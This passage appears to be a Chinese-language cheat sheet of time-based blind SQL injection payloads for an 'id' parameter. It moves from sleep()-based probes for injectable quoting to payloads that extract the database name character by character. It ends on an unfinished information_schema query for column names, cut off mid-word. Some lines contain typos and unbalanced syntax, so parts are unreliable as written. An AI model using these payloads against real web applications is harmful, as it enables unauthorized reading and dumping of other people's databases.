- id=1' and if(1=2,1, sleep(10)) --+
- id=1" and if(1=2,1, sleep(10)) --+
- id=1) and if(1=2,1, sleep(10)) --+
构造暴库语句
- id=1‘ and if((length(database()>1),sleep(4),0) --+ //增加1值来猜库名的长度
- id 1’ and if((ascii(substr(database(),1,1)) > 1),sleep(4),0 )--+ //库名
- id 1’ and if((ascii(substr((select column_name from information_schema. columns where TABLE_name = 'your table' and table_schem